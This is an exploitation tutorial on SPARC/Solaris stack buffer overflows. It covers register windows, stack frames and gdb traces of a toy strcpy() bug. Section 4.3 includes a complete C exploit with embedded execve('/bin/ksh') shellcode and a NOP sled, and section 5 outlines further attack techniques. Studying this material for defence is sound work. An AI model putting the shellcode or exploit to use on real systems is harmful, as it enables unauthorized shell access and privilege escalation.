" IT'S TOASTED "Exploiting SPARC Buffer Overflow vulnerabilities
by pr1 <pr1@u-n-f.com>
----/ Contents
1 - Introduction
2 - Architecture Overview
2.1 - Sparc Registers
2.2 - Sparc Pipeline
2.3 - Instruction Size
2.4 - Function Calls
2.5 - Leaf and Optimized Leaf Procedures
2.6 - Sparc Stack
3 - A Demonstration Vulnerability
3.1 - Studying the overflow in theory
3.2 - Studying the overflow with gdb
4 - Building an exploit
4.1 - Major differences between Sparc and x86
4.2 - Alignment
4.3 - The exploit
5 - Alternative ways of exploiting
6 - Conclusion
7 - References
8 - Greetings
----/ 1 - Introduction
Sparc is a RISC architecture built by Sun Microsystems. It's supported by many
operating systems like Solaris, Linux, OpenBSD, NetBSD, ...
As Sun decided to develop Solaris >= 9 for Sparc only, and as there
is not much information on Sparc overflows on the net, I decided to write
this article. There are some major differences in how Sparc handles calling
and returning from functions and stack management that are
worth knowing. If you ever asked yourself: "Why am I unable to exploit this
simple strcpy() in main() on Sparc ...", this paper has the answer.
----/ 2 - Architecture Overview
There are 32 general purpose registers visible on Sparc at any given time.
8 of them are the "global" registers. They are called %g0 - %g7 and stay
the same across procedure calls. The other 24 registers form a so called
register window. A window consists of 3 types of registers: the "in",
"out" and "local" registers, 8 of each.
A Sparc implementation can have from 2 to 32 windows. Because adjacent
windows share 8 registers, every window adds only 16 registers, which gives
40 - 520 registers in total ( remember that the global registers are static ).
The variable number of registers is the reason Sparc is called scalable.
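The 40 - 520 range follows directly from the window overlap. A minimal
sketch of that arithmetic ( the function name is made up for illustration,
it is not part of any toolchain ):

```c
/* Total number of integer registers of a Sparc implementation with
 * `nwindows` register windows: 8 globals plus 16 registers
 * ( 8 local + 8 in ) per window. The 8 out registers of a window are
 * the in registers of its neighbour, so they are not counted twice.
 * Hypothetical helper for illustration only. */
unsigned int sparc_total_registers(unsigned int nwindows)
{
    return 8u + 16u * nwindows;
}
```

With 2 windows this gives 40 registers, with 32 windows 520.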
At any given time only one window is visible. This window is selected
by the CWP ( current window pointer ), which is a field of the PSR
( processor status register ) in Sparc V8 and a register of its own in
Sparc V9.
Register windows are primarily used for procedure calls. The concept is
that "in" registers contain incoming procedure arguments, "local" registers
can be used for storing values while the procedure executes and "out"
registers contain outgoing arguments. The "global" registers are used for
values that do not change much between procedure calls.
The register windows overlap partially. The SAVE instruction renames the "out"
registers of the caller to become the "in" registers of the called procedure.
Because procedure calls are a quite frequent operation this was meant to
improve performance.
Actually this turned out to be a bad idea, caused by studies that only
considered isolated programs. The drawback is: as soon as the program
interacts with the system the registers have to be stored on the stack, which
results in a lot of slow store and load instructions.
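The overlap of the windows can be pictured as a circular register file.
The following sketch assumes the Sparc V8 convention ( SAVE decrements the
CWP ) and an implementation with 8 windows. The slot numbering, NWINDOWS and
all names are assumptions made for this model; the real layout of the
register file is up to the implementation.

```c
#define NWINDOWS 8u   /* assumed number of windows for this model */

/* Register classes inside one window, in the order used by the model. */
enum reg_class { REG_OUT = 0, REG_LOCAL = 1, REG_IN = 2 };

/* Slot of register number k ( 0 - 7 ) of class cls in window cwp.
 * Every window starts 16 slots after the previous one, but spans 24
 * slots, so the ins of window w are the outs of window w + 1. */
unsigned int window_slot(unsigned int cwp, enum reg_class cls, unsigned int k)
{
    return (16u * cwp + 8u * (unsigned int)cls + k) % (16u * NWINDOWS);
}

/* CWP after a SAVE on Sparc V8: decrement modulo the number of windows. */
unsigned int cwp_after_save(unsigned int cwp)
{
    return (cwp + NWINDOWS - 1u) % NWINDOWS;
}
```

In this model %o7 of the caller and %i7 of the callee end up in the same
slot, while the local registers of two windows never share a slot.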
----/ 2.1 - Sparc Registers
The registers are organized as follows:
%g0 - %g7 ( %r0 - %r7 )  : global registers
%o0 - %o7 ( %r8 - %r15 ) : out registers, they contain arguments for
                           procedure calls
%l0 - %l7 ( %r16 - %r23 ): local registers, use them for local variables
%i0 - %i7 ( %r24 - %r31 ): in registers, after a procedure call these
                           registers contain incoming arguments
Some special registers:
%g0        : always contains zero ( hardwired )
%sp ( %o6 ): the stack pointer, points to the top of the stack frame
             ( its lowest address )
%o7        : called subroutine's return address ( return address - eight ),
             written by call
%fp ( %i6 ): the frame pointer, points to the bottom of the stack frame
             ( the %sp of the caller )
%i7        : our own return address ( return address - eight )
%o0        : return value from called subroutine
----/ 2.2 - The Sparc Pipeline
The Sparc architecture uses a pipeline to improve performance. With a
pipeline more instructions can be fetched/executed in the same time than
without one. Usually there are several steps until a CPU finishes the
execution of an instruction. The instruction has to be fetched, decoded and
executed, branches have to be completed ( pc = npc ) and results have to be
written to the destination.
Doing all these things and then starting from the beginning with the next
instruction is a waste of time. Thus a pipeline overlaps these steps: while
it decodes the first instruction it already fetches the next one... and so on.
Using this technique several instructions can be executed almost in
parallel. How these steps are implemented differs from pipeline to pipeline.
As seen by the programmer the Sparc pipeline has a depth of two. Hence there
is a PC and an nPC ( next program counter, pointing to the next instruction
to be executed ).
nPC is always copied into PC after the current instruction was executed.
You might ask yourself what happens if the CPU executes a branch instruction
( jumps somewhere ) and already has the next instruction in the pipeline.
It is unknown at compile time whether this branch will be taken or not.
The already fetched instruction could simply be discarded but this
would be a performance loss. Thus the Sparc architecture executes the
instruction following the branch instruction ( the branch delay slot )
before the branch is taken.
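The PC/nPC pair and the delay slot can be modelled in a few lines. This is
only a toy model under simplifying assumptions: the program is loaded at
address 0, every branch is taken and the annul bit is ignored. The struct
and function names are made up for this sketch.

```c
#include <stddef.h>

/* One toy instruction: either a plain operation or a delayed branch. */
struct insn {
    int is_branch;        /* non-zero: delayed control transfer */
    unsigned int target;  /* branch target ( byte address ) if is_branch */
};

/* Executes `steps` instructions of `prog` ( 4 bytes each, loaded at
 * address 0 ) and records the address of every executed instruction
 * in `trace`. */
void run_delayed(const struct insn *prog, size_t steps, unsigned int *trace)
{
    unsigned int pc = 0, npc = 4;
    size_t i;

    for (i = 0; i < steps; i++) {
        const struct insn *cur = &prog[pc / 4];
        /* a branch only changes nPC, never PC directly */
        unsigned int next_npc = cur->is_branch ? cur->target : npc + 4;

        trace[i] = pc;
        pc = npc;         /* the delay slot instruction always comes next */
        npc = next_npc;   /* the branch takes effect one step later */
    }
}
```

For a program with a branch to address 16 at address 4, the executed
addresses are 0, 4, 8, 16: the instruction at address 8 ( the delay slot )
still runs, the one at address 12 is skipped.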
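For example, the instruction placed right after a "call subroutine" is
executed before the first instruction of subroutine.
---/ 2.3 - Instruction size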
x86 instructions differ in their length. Sparc uses a pipeline to
improve performance and the designers found it easier to implement every
instruction as a four byte opcode sequence. But this also means that a
NOP has a length of four bytes as well. Usually this would be a little problem
( consider what happens if we jump into the middle of a NOP ).
Because we have to care about alignment anyway ( see 4.2 ) this problem
vanishes soon though.
---/ 2.4 - Function calls
The Sparc architecture uses the call/ret instruction pair to implement
procedure calls. RET is a so called synthetic instruction. The hardware
equivalent instruction ( the instruction assembled into the binary ) is a
jump and link ( jmpl ). The same holds for CALL when the target is given as
a register or address expression. CALL with a label is a real instruction
that carries a 30 bit word displacement, but it behaves the same way.
Note that the "l" stands for link, not for long.
The assembler plays a bigger role for execution speed on RISC than on CISC:
* The assembler reorders instructions into a logically equivalent
  sequence to prevent different pipeline hazards.
* It also optimizes branch delay slots by placing useful instructions
  in there.
* It expands synthetic instructions into one or more hardware
  instructions.
For example:
* call address == jmpl address,%o7
  ( remember that %o7 contains the called subroutine's return address - 8 )
* ret == jmpl %i7+8,%g0
  ( remember that %i7 is ret address - 8, %g0 always
  contains zero )
The CALL instruction saves the current value of PC ( the address of the call
itself ) in %o7, copies nPC into PC and sets nPC to the address specified in
the CALL.
The RET instruction copies nPC into PC and sets nPC to %i7+8. 8 bytes are
added to the address because the address saved in %i7 is the address of the
call instruction. Because all instructions have a size of four bytes and
there is a branch delay slot of four bytes after the call we have to skip
eight bytes.
%i7 is used instead of %o7 because the SAVE instruction renamed the "out"
registers to "in" registers.
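To make the numbers concrete, here is a small sketch of how the pc-relative
form of CALL is encoded ( format 1: the two top bits are 01, followed by a
30 bit word displacement ) and where RET continues. The function names are
ours and only serve this illustration.

```c
#include <stdint.h>

/* Encodes "call target" for a call instruction located at address pc.
 * The displacement is counted in words ( 4 bytes ) relative to pc. */
uint32_t encode_call(uint32_t pc, uint32_t target)
{
    uint32_t disp30 = ((target - pc) >> 2) & 0x3fffffffu;
    return 0x40000000u | disp30;
}

/* Address at which execution continues after "ret" ( jmpl %i7+8,%g0 ):
 * %i7 holds the address of the call, the delay slot follows at +4. */
uint32_t return_target(uint32_t i7)
{
    return i7 + 8u;
}
```

A call to the instruction right before itself ( displacement -1 ) encodes
to 0x7fffffff, which is the call used by the shellcode in 4.3. With
%i7 = 0x10640, the value seen in copy() in the gdb session of 3.2, ret
continues at 0x10648.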
The next thing a procedure does is reserving some stack space to store
automatic ( local ) variables, compiler temporaries, the pointer to the
return value, ...
This is done with the SAVE and RESTORE instructions.
* SAVE:
  The SAVE instruction reserves stack space for the above mentioned
  things. Its syntax is:
  save %sp, imm(ediate value), %sp
  SAVE makes the old %sp the new %fp, adds imm to the old %sp and
  stores the result in the new %sp. Because the stack grows down
  imm should be a negative value. The CWP field in the PSR
  register is also decremented ( out registers become in registers ).
  Note that on Sparc V9 the behaviour is a little different. Sparc V9
  has a separate register for CWP. SAVE increments the CWP and RESTORE
  decrements it.
* RESTORE:
  RESTORE increments the CWP ( Sparc V9 decrements it ).
  The in registers become the out registers again. The eight in registers
  and the eight local registers are restored to the values they contained
  before the most recent SAVE instruction. The RESTORE instruction
  then acts like an add instruction, except that the source registers
  are from the old register set and the destination register is from
  the new register set. The old %fp thereby becomes the new %sp.
A procedure prologue and epilogue thus look like:
  save %sp, -368, %sp
  ....
  ....
  ....
  ret
  restore
RESTORE sits in the delay slot of RET. It is executed one slot later in the
pipeline, but its effects take place before control arrives at the return
address.
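The effect of SAVE and RESTORE on %sp and %fp can be written down as a
small model. It ignores the CWP and all other registers; the struct and
function names are assumptions made for this sketch.

```c
#include <stdint.h>

struct frame_regs {
    uint32_t sp;  /* %sp ( %o6 ) of the current window */
    uint32_t fp;  /* %fp ( %i6 ) of the current window */
};

/* "save %sp, imm, %sp": the caller's %sp becomes the callee's %fp and
 * the callee's %sp is the caller's %sp plus the ( negative ) imm. */
struct frame_regs do_save(struct frame_regs caller, int32_t imm)
{
    struct frame_regs callee;

    callee.fp = caller.sp;
    callee.sp = caller.sp + (uint32_t)imm;
    return callee;
}

/* Plain "restore": the callee's %fp is the caller's %sp again. The
 * caller's %fp comes back from the caller's own window ( caller_fp ). */
struct frame_regs do_restore(struct frame_regs callee, uint32_t caller_fp)
{
    struct frame_regs caller;

    caller.sp = callee.fp;
    caller.fp = caller_fp;
    return caller;
}
```

Fed with the values from the gdb session in 3.2 ( %sp = 0xffbef838 in main()
and a frame size of 368 bytes ) the model yields %fp = 0xffbef838 and
%sp = 0xffbef6c8, which are the values gdb shows inside copy().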
---/ 2.5 - Leaf and Optimized Leaf Procedures
A leaf procedure is a procedure that does not call any other procedures.
A routine that does not allocate a register window of its own by executing
the SAVE instruction is termed an optimized leaf procedure.
One way to recognize an optimized leaf procedure is by scanning the
assembly code and noting the absence of a SAVE instruction. Optimized leaf
routines do not have a stack frame allocated to them. They use their
caller's stack frame and register window and return with retl
( jmpl %o7+8,%g0 ).
If the routine is an optimized leaf, the previous frame's PC should be looked
up in register %o7. Otherwise it needs to be looked up in register %i7, which
is what register %o7 becomes after a SAVE instruction. This is what defines
leafness.
---/ 2.6 - The Sparc Stack
                   High Addresses
          /------------------------------------------------\
%fp -> cw | automatic variables                            |
          |------------------------------------------------|
       cw | space allocated with alloca()                  |
          |------------------------------------------------|
       cw | space for compiler temporaries                 |
          |------------------------------------------------|
       cl | outgoing parameters                            |
          |------------------------------------------------|
       cl | copies of outgoing parameters                  |
          |------------------------------------------------|
       cl | one word ( hidden parameter )                  |
          |------------------------------------------------|
%sp -> cl | 64 byte for possible copy of register window   |
          \------------------------------------------------/
                   Low Addresses
The stack frame consists of 2 parts:
Current Workspace ( cw ):
  The current workspace is used by C procedures. It consists of
  automatic variables, space allocated by alloca() and space for
  compiler temporaries. When writing an assembly routine you only
  have to calculate space for temporary values you need.
Call Linkage ( cl ):
  This space is required to save outgoing registers and the register
  window when control passes to another procedure.
The Call Linkage is important for exploiting Sparc overflows.
The minimum stack frame size is 96 bytes.
It consists of:
* 64 bytes for a copy of the register window ( 16 registers * 4 bytes )
* 6 * 4 bytes for outgoing parameters
* 4 bytes for the hidden parameter
These are only 92 bytes, but the stack and frame pointer are required to be
on an eight byte boundary ( 92 is not divisible by eight ).
Hence the minimum stack frame size is 96 bytes.
The eight byte boundary is needed for doubleword loads and stores. As a side
effect there is at least space for one temporary variable.
The current workspace contains a dynamically allocated area ( alloca() ), so
we can not tell at compile time how big it will be. Hence automatic
variables are accessed via %fp with negative offsets and the others are
accessed via %sp with positive offsets.
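The frame size arithmetic from above as a short sketch. The macro and
function names are hypothetical. The result is only the lower bound given
by the layout; a compiler is free to reserve more.

```c
#include <stddef.h>

#define WINDOW_SAVE_AREA 64u  /* 16 registers * 4 bytes */
#define HIDDEN_PARAM      4u  /* one word for the hidden parameter */
#define OUTGOING_ARGS    24u  /* 6 * 4 bytes for outgoing parameters */

/* Rounds n up to the next multiple of eight. */
size_t round_up8(size_t n)
{
    return (n + 7u) & ~(size_t)7u;
}

/* Smallest legal frame for `workspace_bytes` of current workspace
 * ( automatic variables and compiler temporaries ). */
size_t min_frame_size(size_t workspace_bytes)
{
    return round_up8(WINDOW_SAVE_AREA + HIDDEN_PARAM + OUTGOING_ARGS
                     + workspace_bytes);
}
```

Without any workspace this yields the 96 bytes mentioned above. The 4 bytes
of padding are also why one 4 byte temporary still fits into a 96 byte
frame.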
----/ 3 - A demonstration vulnerability
Not every buffer overflow is exploitable on Sparc. We need at least one
level of function nesting to be able to exploit it.
#include <string.h>
/* copies its argument into a fixed size buffer without a length check */
void copy( const char *a ){
    char buf[256];
    strcpy(buf,a);
}
int main( int argc, char *argv[] ) {
    copy( argv[1] );
    return 0;
}
---/ 3.1 - Studying the overflow in theory
Let us recall what happens on function calls and function returns.
%i7 contains main's return address. main() will return into _start, which
calls exit() to perform cleanup before program termination.
main() calls copy(): call ( jmpl ) saves the return address back
into main() in register %o7, and the SAVE instruction in copy() in/decrements
the CWP, renaming %o7 into %i7. main's own %i7 is already filled with
main's return address into _start though. Thus main's register
window has to be stored on the stack. It is stored at copy's %fp ( which is
main's %sp ), right above copy's local variables. %i7 now contains copy's
return address back into main().
strcpy() follows the same algorithm.
When strcpy() writes beyond the end of buf it overwrites the memory above
copy's local variables, including the register window saved at copy's %fp.
strcpy's stack frame and its stored return address back into copy() are
still intact ( they lie below buf ) and strcpy() returns back into copy().
All register contents are still intact but the saved window at copy's %fp is
damaged. copy() finally restores and jumps back to main(). But main's
register window was saved there and damaged by our overflowing strcpy().
When returning back into main() the saved/damaged register window is
restored. The in and local registers now contain user supplied data. When
main() returns it would usually jump into _start to perform cleanup, but as
we changed the return address it jumps into nowhere ( 0x61616161 ) and dies
with a SIGBUS error.
---/ 3.2 - Studying the overflow with gdb
Let us feed this into gdb and see what happens. Note that I have deleted
redundant information, like static registers that are not saved in the
register windows, to shorten the output and to make the overflowing
process clearer.
These are our registers in main() before copy() is called.
(gdb) info register
sp 0xffbef838
o7 0x106c0
l0 0xc
l1 0xff3400a4
l2 0xff33c5d8
l3 0x0
l4 0x0
l5 0x0
l6 0x0
l7 0xff3e6694
i0 0x2
i1 0xffbef90c
i2 0xffbef918
i3 0x20870
i4 0x0
i5 0x0
fp 0xffbef8a8
i7 0x104c8
This is our stack frame before copy() is called.
That's our saved register window. Note the saved PC at 0xffbef874.
(gdb) x/96x $sp
%sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000 [%l0 - %l3]
0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694 [%l4 - %l7]
0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870 [%i0 - %i3]
0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 [%i4 - %i7]
. . . . .
. . . . .
. . . . .
%fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020
Breakpoint 5, 0x10610 in copy ()
Register values in copy() before the call to strcpy().
(gdb) info register
sp 0xffbef6c8
o7 0x0
l0 0x0
l1 0x0
l2 0x0
l3 0x0
l4 0x0
l5 0x0
l6 0x0
l7 0x0
i0 0xffbefa37
i1 0xffbef910
i2 0xffbef90c
i3 0x300
i4 0x2371c
i5 0xff29bbc0
fp 0xffbef838
i7 0x10640
And the stack frame before the strcpy() call. Note how the saved register
window ( of main() ) moved "below" our input buffer in the dump, i.e. to
higher addresses.
The first 64 bytes at %sp belong to the register window of copy(). We will
not be able to overwrite the PC at 0xffbef704 because it's "above" our input
buffer in the dump, i.e. at a lower address. This PC contains the return
address back to main.
(gdb) x/96x $sp
%sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640 [saved PC]
. . . . .
. . . . .
. . . . .
buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000
. . . . .
. . . . .
. . . . .
%fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000
0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694
0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870
0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8
And the same stack frame after the strcpy() call:
buf -> 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161
0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161
. . . . .
. . . . .
. . . . .
0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161*
[* PC to exit damaged ]
Very nice. We were able to alter main's saved PC into exit.
After copy() restores, the in and local registers are set to the
"saved/damaged" values. Because we altered these values through the overflow
of the input buffer, the in and local registers contain our supplied values.
Breakpoint 7, 0x10648 in main ()
(gdb) info register
sp 0xffbef838
o7 0x10640
l0 0x61616161
l1 0x61616161
l2 0x61616161
l3 0x61616161
l4 0x61616161
l5 0x61616161
l6 0x61616161
l7 0x61616161
i0 0x61616161
i1 0x61616161
i2 0x61616161
i3 0x61616161
i4 0x61616161
i5 0x61616161
fp 0x61616161
i7 0x61616161
----/ 4 - Building an exploit
In this section we will build an exploit for the vulnerability we just
studied. We also list some differences between x86 and Sparc exploitation
and cover alignment issues.
---/ 4.1 - Differences between x86 and Sparc exploitation
* memory access:
  On x86, as on most CISC processors, we can write to unaligned memory
  addresses without the CPU complaining. Sometimes we only have to
  adjust the alignment. Not so on Sparc. See more about alignment in 4.2.
  Note that tolerating unaligned memory accesses is a CPU feature of
  the x86 family. It will complain if the AC ( alignment check ) flag
  is set in the flags register.
* call/ret internals:
  Because of the internal workings of the Sparc stack frames and call/ret
  pairs we need at least one level of function nesting to be able to
  exploit a buffer overflow vulnerability on Sparc.
* finding the stack base address:
  Sparc Solaris uses a different stack base address on different
  architectures.
  - sun4u: 0xffbe....,
  - sun4m: 0xefff....,
  - sun4d: 0xdfff....
  We can get the current stack pointer, which lies close to the stack base,
  with the following assembler snippet:
  unsigned long get_sp( void ) {
      /* %i0 becomes the return value ( %o0 of the caller ) on restore */
      __asm__(" or %sp, %sp, %i0 " );
  }
* size of overflow:
  On Sparc we usually have to be able to write more than just a
  few bytes beyond the target buffer. This is because we have to overwrite
  at least %l0 - %l7 and %i0 - %i6 before reaching the saved return address.
* overwriting an address with one byte:
  Overflowing an address by one byte on x86 lets us control
  its least significant byte. Chances are good that we can
  alter some stack address a little bit to point into our shellcode.
  As Sparc is a big endian architecture the most significant byte of an
  address is stored first, so a one byte overflow can only alter the most
  significant byte. This decreases our chances of providing some useful
  address.
  See [3] for more details on one byte overflows.
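The difference between a one byte overflow on a big endian and on a little
endian machine can be simulated portably. The helpers below are a sketch
with made up names: they lay a 32 bit value out in memory byte by byte,
overwrite the first byte and read the value back.

```c
#include <stdint.h>

/* One byte overflow into a 32 bit value stored big endian ( Sparc ). */
uint32_t overwrite_first_byte_be(uint32_t value, uint8_t b)
{
    uint8_t mem[4];

    mem[0] = (uint8_t)(value >> 24);  /* most significant byte first */
    mem[1] = (uint8_t)(value >> 16);
    mem[2] = (uint8_t)(value >> 8);
    mem[3] = (uint8_t)value;
    mem[0] = b;                       /* the overflowing byte */
    return ((uint32_t)mem[0] << 24) | ((uint32_t)mem[1] << 16) |
           ((uint32_t)mem[2] << 8)  |  (uint32_t)mem[3];
}

/* The same overflow into a value stored little endian ( x86 ). */
uint32_t overwrite_first_byte_le(uint32_t value, uint8_t b)
{
    uint8_t mem[4];

    mem[0] = (uint8_t)value;          /* least significant byte first */
    mem[1] = (uint8_t)(value >> 8);
    mem[2] = (uint8_t)(value >> 16);
    mem[3] = (uint8_t)(value >> 24);
    mem[0] = b;                       /* the overflowing byte */
    return  (uint32_t)mem[0]        | ((uint32_t)mem[1] << 8) |
           ((uint32_t)mem[2] << 16) | ((uint32_t)mem[3] << 24);
}
```

A terminating zero byte turns the stack address 0xffbef838 into 0x00bef838
on Sparc, which is far away from the stack, but into 0xffbef800 on x86,
which is still a nearby stack address.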
---/ 4.2 - Alignment
Like most other RISC processors Sparc does not allow unaligned memory
accesses. This means we must not read a word from, write a word to or jump
to any address that is not on a 4 byte boundary. Otherwise the CPU generates
a Bus Error exception and our program dies. Also consider what happens
if our NOPs are not laid out on 4 byte boundaries. Remember that every
Sparc instruction is 4 bytes long, so the CPU would fetch words that start
in the middle of one NOP and end in the middle of the next one. It is very
probable that the processor would generate an Illegal Instruction exception
and our program would crash as well.
That is why we have to take care that our exploit return address is a
multiple of 4, our shellcode lies at a 4 byte boundary in our attack
buffer and the length of our attack buffer itself is a multiple of 4.
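The alignment rules boil down to two one-liners. The names are ours; the
sketch assumes 32 bit addresses.

```c
#include <stdint.h>

/* Non-zero if addr lies on a 4 byte boundary. */
int is_word_aligned(uint32_t addr)
{
    return (addr & 3u) == 0;
}

/* Rounds addr down to the previous 4 byte boundary by clearing the
 * two low order bits. */
uint32_t align_down4(uint32_t addr)
{
    return addr & ~(uint32_t)3u;
}
```

For example 0xffbef83b is rounded down to 0xffbef838.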
---/ 4.3 - Exploiting the vulnerability
Note that we take care to write only to aligned memory addresses.
If we put our shellcode at some unaligned address in our attack buffer
we will never be able to reach it. Same with the NOPs. Unaligned NOPs
make us land in the middle of a NOP every time we reach the NOPs.
This results in an Illegal Instruction exception and our program dies
without executing our code.
We also have to set %fp to a "safe" address or the return from main() will
crash. A "safe" address is simply some valid, aligned stack address. We
could also use our return address to overwrite %fp.
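The offsets 328 and 332 used by the exploit can be derived from the gdb
session in 3.2: buf starts at 0xffbef728 and main's register window is saved
at copy's %fp = 0xffbef838. The following sketch redoes this arithmetic. The
struct only mirrors the order in which gdb showed the saved window, and all
names are made up for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Layout of the 64 byte register window save area. */
struct window_save_area {
    uint32_t local[8];  /* %l0 - %l7 */
    uint32_t in[8];     /* %i0 - %i7, in[6] = %fp, in[7] = saved PC */
};

/* Distance in bytes from the start of the buffer to saved register
 * %i<n> of the caller, whose save area starts at the %fp of the
 * function that owns the buffer. */
uint32_t offset_to_saved_in(uint32_t buf_addr, uint32_t callee_fp,
                            unsigned int n)
{
    return callee_fp + (uint32_t)offsetof(struct window_save_area, in)
           + 4u * n - buf_addr;
}
```

With the addresses from above the saved %fp lies 328 bytes and the saved PC
332 bytes behind the start of buf, so an attack buffer of 336 bytes is just
large enough to reach both.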
/* Exploits toy vulnerability on Sparc/Solaris
 *
 * pr1
 * June 2002
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
/* lsd - Solaris shellcode
*/
static char shell[]= /* 10*4+8 bytes */
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call */
"\x90\x03\xe0\x20" /* add %o7,32,%o0 */
"\x92\x02\x20\x10" /* add %o0,16,%o1 */
"\xc0\x22\x20\x08" /* st %g0,[%o0+8] */
"\xd0\x22\x20\x10" /* st %o0,[%o0+16] */
"\xc0\x22\x20\x14" /* st %g0,[%o0+20] */
"\x82\x10\x20\x0b" /* mov 0x0b,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh" ;
#define BUFSIZE 336
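/* Sparc NOP replacement without zero bytes ( or %l6,0x16e,%l6 )
 */
static char np[] = "\xac\x15\xa1\x6e";
/* returns the current stack pointer: %i0 becomes the return value
 * ( %o0 of the caller ) when the function restores
 */
unsigned long get_sp( void ) {
    __asm__("or %sp,%sp,%i0");
}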
int main( int argc, char *argv[] ) {
    char buf[ BUFSIZE ],*ptr;
    unsigned long ret,sp;
    int i,err;
    ret = sp = get_sp();
    if( argv[1] ) {
        ret -= strtoul( argv[1], (void *)0, 16 );
    }
    /* align return address to a 4 byte boundary */
    ret &= ~3UL;
    bzero( buf, BUFSIZE );
    /* fill the buffer with NOPs; memcpy() instead of strcpy() avoids
     * writing a terminating zero one byte past the end of buf */
    for( i = 0; i < BUFSIZE; i+=4 ) {
        memcpy( &buf[i], np, 4 );
    }
    memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell ));
    ptr = &buf[328];
    /* set fp to a safe stack value
     */
    *( ptr++ ) = ( sp >> 24 ) & 0xff;
    *( ptr++ ) = ( sp >> 16 ) & 0xff;
    *( ptr++ ) = ( sp >> 8 ) & 0xff;
    *( ptr++ ) = ( sp ) & 0xff;
    /* we now overwrite saved PC
     */
    *( ptr++ ) = ( ret >> 24 ) & 0xff;
    *( ptr++ ) = ( ret >> 16 ) & 0xff;
    *( ptr++ ) = ( ret >> 8 ) & 0xff;
    *( ptr++ ) = ( ret ) & 0xff;
    /* terminate the string; note that this zeroes the low byte of ret */
    buf[ BUFSIZE -1 ] = 0;
#ifndef QUIET
    printf("Return Address 0x%lx\n",ret);
#endif
    err = execl( "./vul", "vul", buf, ( void *)0 );
    if( err == -1 ) perror("execl");
    return 1;
}
----/ 5 - Alternative ways of exploitation
As we saw, very small overruns are not as likely to be exploitable on
Sparc as they are on other platforms. But let us consider some
special cases where you are able to overwrite other sensitive
information on the stack.
An example is overwriting a program's function pointer or jmp_buf with
the address of system() and telling it to execute /bin/sh.
See [4] for more information about overwriting such structures.
On Sparc the text segment is mapped at small addresses.
If we now try to overwrite this function pointer/jmp_buf with the address of
some other function, we can not write this small address without any 0x00
bytes. This is because we can only write from most to least significant byte
on Sparc: the zero high order bytes come first and a string copy stops at
the first 0x00 byte.
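Whether an address survives a string copy on a big endian machine can be
checked with a few lines. The function name is made up for this sketch.

```c
#include <stdint.h>

/* Index ( 0 = most significant ) of the first 0x00 byte of addr in big
 * endian byte order, or -1 if the address contains no zero byte. A
 * string copy writes exactly the bytes in front of that index. */
int first_zero_byte_be(uint32_t addr)
{
    int i;

    for (i = 0; i < 4; i++) {
        if (((addr >> (24 - 8 * i)) & 0xffu) == 0)
            return i;
    }
    return -1;
}
```

For the text address 0x000104c8 from the gdb session the very first byte is
already zero, so nothing of it gets copied. The stack address 0xffbef838
contains no zero byte at all.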
An alternative way is placing shellcode onto the stack and overwriting
the function pointer with the shellcode's stack address, which consists of
four non-zero bytes ( eight hex digits ).
Because of alignment restrictions on Sparc we can't exploit format
string vulnerabilities via the "%n" directive in the usual way ( writing one
byte 4 times at unaligned addresses ).
By using the short qualifier ( "%hn" ) the unaligned access is either
emulated in software or special machine instructions are used, and you can
usually write on every two byte boundary. See [6] for more information.
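Writing on two byte boundaries means that one 32 bit value is split into two
16 bit halves. On a big endian machine the high half goes to the lower
address. A minimal sketch of that split, with hypothetical names and without
any format string handling:

```c
#include <stdint.h>

struct half_write {
    uint32_t addr;   /* two byte aligned destination address */
    uint16_t value;  /* 16 bit value to store there */
};

/* Splits one big endian 32 bit store to addr into two 16 bit stores. */
void split_for_hn(uint32_t addr, uint32_t value, struct half_write out[2])
{
    out[0].addr  = addr;                       /* high half first */
    out[0].value = (uint16_t)(value >> 16);
    out[1].addr  = addr + 2u;                  /* low half follows */
    out[1].value = (uint16_t)(value & 0xffffu);
}
```

Storing 0xffbef838 at address 0x00020870 becomes a store of 0xffbe to
0x00020870 and a store of 0xf838 to 0x00020872.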
The return into libc technique can also be applied on Solaris/Sparc to
defeat non executable stack patches. See [7] for more information.
Dynamic heap overflows via corruption of malloc internal structures
are exploitable on Sparc as well.
See [8] and [9] for a glibc and the SysV malloc implementation and
exploitation discussion.
----/ 6 - Conclusion
We need a bit more luck to be able to exploit Sparc buffer overflows
than their brothers/sisters on x86. In general it is not enough to be
able to overwrite just a few bytes beyond the buffer. Additionally we saw
that the way the stack is handled has a great influence on the
exploitability of buffer overrun vulnerabilities. This class of
vulnerabilities can not always be exploited on Sparc as there must exist at
least one level of subroutine call nesting, so that two consecutive
ret/restore pairs are executed by a vulnerable program after its stack got
overrun.
----/ 7 - References
[1] UNF - United Net Frontier
[http://www.u-n-f.com]
[2] Sun Microsystems
Sparc Assembly Language Reference Manual
[http://www.sparc.org]
[3] Klog
Frame pointer overwriting
[http://www.phrack.org/show.php?p=55&a=8]
[4] Matt Conover aka. Shok
w00w00 on Heap Overflows
